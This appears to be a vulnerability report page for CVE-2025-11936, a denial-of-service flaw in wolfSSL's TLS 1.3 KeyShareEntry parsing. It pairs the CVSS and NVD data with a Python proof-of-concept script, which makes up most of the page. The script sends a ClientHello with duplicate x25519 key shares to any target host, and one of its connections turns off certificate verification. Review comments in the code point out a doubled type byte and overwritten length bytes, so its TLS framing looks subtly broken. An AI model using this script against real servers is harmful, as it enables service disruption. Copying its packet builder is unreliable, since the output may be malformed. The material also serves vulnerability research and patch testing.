Security Vulnerability Report
CVE-2025-11936 CVSS 5.3 MEDIUM

CVE-2025-11936

Published: 2025-11-21 23:15:45
Last Modified: 2025-12-03 18:47:26

Description

Improper input validation in the TLS 1.3 KeyShareEntry parsing in wolfSSL v5.8.2 on multiple platforms allows a remote unauthenticated attacker to cause a denial-of-service by sending a crafted ClientHello message containing duplicate KeyShareEntry values for the same supported group, leading to excessive CPU and memory consumption during ClientHello processing.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSL v5.8.2 (the NVD configuration data below lists versions from 5.8.2 inclusive up to, but excluding, 5.8.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""PoC script published with the CVE-2025-11936 report (wolfSSL 5.8.2, TLS 1.3 KeyShareEntry DoS).

What the script does, as written: builds one TLS record carrying a ClientHello whose
key_share extension contains two entries for the same group (x25519, 0x001d), and
writes it once to a raw TCP socket. It reads nothing back and performs no check of
any server-side effect, so its only observable result is the printed status line.

NOTE(review): the builder uses no randomness (the 32-byte Random field is all zeros,
the key material is fixed filler), so create_malicious_client_hello() returns the
same constant byte string on every call.
"""
import socket
import ssl
import struct


def create_malicious_client_hello() -> bytes:
    """
    PoC for CVE-2025-11936: wolfSSL TLS 1.3 KeyShareEntry DoS
    Creates a ClientHello with duplicate KeyShareEntry values

    Returns:
        bytes: a single TLS record. The ClientHello advertises TLS 1.3 via
        supported_versions (0x002b), offers TLS_AES_128_GCM_SHA256 and
        TLS_AES_256_GCM_SHA384, and carries a key_share (0x0033) extension
        with two x25519 entries: 32 bytes of 0x41 followed by 32 bytes of 0x42.
        The output is deterministic (no random source is used).
    """
    # TLS 1.3 ClientHello with duplicate KeyShareEntry
    client_hello = bytearray()
    # TLS Record Header (Content Type: Handshake)
    client_hello.extend([0x16, 0x03, 0x01])
    # Handshake type: ClientHello (1)
    # NOTE(review): a 0x01 type byte is appended here and a second one is
    # appended further down (`client_hello.extend([0x01])`); the final
    # `client_hello[3:5] = record_length` assignment then overwrites buffer
    # bytes 3-4 in place. The emitted framing was not verified against the
    # TLS record/handshake header layout here -- TODO confirm before relying
    # on this builder's output as a well-formed ClientHello.
    client_hello.append(0x01)
    # We will construct the handshake message body
    handshake_body = bytearray()
    # Version: TLS 1.2 (for compatibility)
    handshake_body.extend([0x03, 0x03])
    # Random (32 bytes) -- all zeros, so the record is a fixed byte string
    handshake_body.extend([0x00] * 32)
    # Session ID length
    handshake_body.extend([0x00])
    # Cipher Suites (2 bytes length + suites)
    cipher_suites = bytearray([
        0x13, 0x01,  # TLS_AES_128_GCM_SHA256
        0x13, 0x02   # TLS_AES_256_GCM_SHA384
    ])
    handshake_body.extend(struct.pack('>H', len(cipher_suites)))
    handshake_body.extend(cipher_suites)
    # Compression methods
    handshake_body.extend([0x01, 0x00])
    # Extensions
    extensions = bytearray()
    # Extension: supported_versions (0x002b)
    supported_versions_ext = bytearray([
        0x00, 0x2b,  # Extension type
    ])
    version_data = bytearray([
        0x00, 0x02,  # Length
        0x03, 0x04   # TLS 1.3
    ])
    supported_versions_ext.extend(struct.pack('>H', len(version_data)))
    supported_versions_ext.extend(version_data)
    extensions.extend(supported_versions_ext)
    # Extension: key_share (0x0033) - with DUPLICATE entries
    key_share_ext = bytearray([
        0x00, 0x33,  # Extension type
    ])
    # KeyShareEntry 1 - x25519 (0x001d)
    key_share_entry1 = bytearray([
        0x00, 0x1d,  # Supported group: x25519
        0x00, 0x20,  # Key exchange length: 32 bytes
    ])
    key_share_entry1.extend([0x41] * 32)  # Fake key material (fixed filler, not a real public key)
    # KeyShareEntry 2 - DUPLICATE x25519 (same group!)
    key_share_entry2 = bytearray([
        0x00, 0x1d,  # Supported group: x25519 (DUPLICATE!)
        0x00, 0x20,  # Key exchange length: 32 bytes
    ])
    key_share_entry2.extend([0x42] * 32)  # Different fake key material
    # Only these two entries are sent; the report's description speaks of
    # duplicate entries "for the same supported group" without giving a count.
    key_share_data = key_share_entry1 + key_share_entry2
    key_share_ext.extend(struct.pack('>H', len(key_share_data)))
    key_share_ext.extend(key_share_data)
    extensions.extend(key_share_ext)
    # Extension length
    extensions_length = struct.pack('>H', len(extensions))
    # Handshake body
    handshake_body.extend(extensions_length)
    handshake_body.extend(extensions)
    # Handshake length -- 4-byte big-endian length with the top byte dropped (3-byte field)
    handshake_length = struct.pack('>I', len(handshake_body))[1:]
    client_hello.extend([0x01])  # Handshake type: ClientHello (second type byte, see note above)
    client_hello.extend(handshake_length)
    client_hello.extend(handshake_body)
    # Update record length -- written in place over buffer bytes 3-4 (see note above)
    record_length = struct.pack('>H', len(client_hello) - 5)
    client_hello[3:5] = record_length
    return bytes(client_hello)


def exploit(target_host: str, target_port: int = 443) -> None:
    """
    Send malicious ClientHello to trigger DoS

    Args:
        target_host: host name or address handed to socket.create_connection()
            and socket.connect(); also used as server_hostname for the ssl
            handshake.
        target_port: TCP port, 443 by default.

    Behaviour as written: two separate connections. The first is an ordinary
    TLS handshake made by the stdlib ``ssl`` module with hostname checking and
    certificate verification disabled; it does not send the crafted record.
    The second is a raw TCP connection over which the crafted record is sent
    once. Nothing is read back; every exception from either step is caught
    and printed rather than raised.
    """
    print(f"[*] Sending malicious ClientHello to {target_host}:{target_port}")
    try:
        context = ssl.create_default_context()
        # Verification is switched off, so this handshake accepts any certificate.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        with socket.create_connection((target_host, target_port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=target_host) as ssock:
                # NOTE(review): the original comment here ("This will fail, but we
                # sent the malicious ClientHello") does not describe this block:
                # the ssl module builds and sends its own ClientHello, and the
                # crafted record is only sent over the raw socket below.
                pass
    except Exception as e:
        # Only the exception class name is reported, not its message.
        print(f"[*] Connection result: {type(e).__name__}")
    malicious_hello = create_malicious_client_hello()
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        # Single write; no response is read and the server's state is not observed.
        sock.send(malicious_hello)
        print("[+] Malicious ClientHello sent successfully")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    import sys
    # CLI: argv[1] is the host, optional argv[2] the port. int() is applied
    # without validation, so a non-numeric port raises ValueError here.
    if len(sys.argv) > 1:
        exploit(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443)
    else:
        print("Usage: python cve_2025_11936_poc.py <target_host> [port]")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11936", "sourceIdentifier": "[email protected]", "published": "2025-11-21T23:15:44.710", "lastModified": "2025-12-03T18:47:25.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation in the TLS 1.3 KeyShareEntry parsing in wolfSSL v5.8.2 on multiple platforms allows a remote unauthenticated attacker to cause a denial-of-service by sending a crafted ClientHello message containing duplicate KeyShareEntry values for the same supported group, leading to excessive CPU and memory consumption during ClientHello processing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8.2", "versionEndExcluding": "5.8.4", "matchCriteriaId": "EB81B784-14DD-4CD0-859A-62D42ADDD7D3"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wolfSSL/wolfssl/pull/9117", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/wolfSSL/wolfssl/pull/9117", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Patch"]}]}}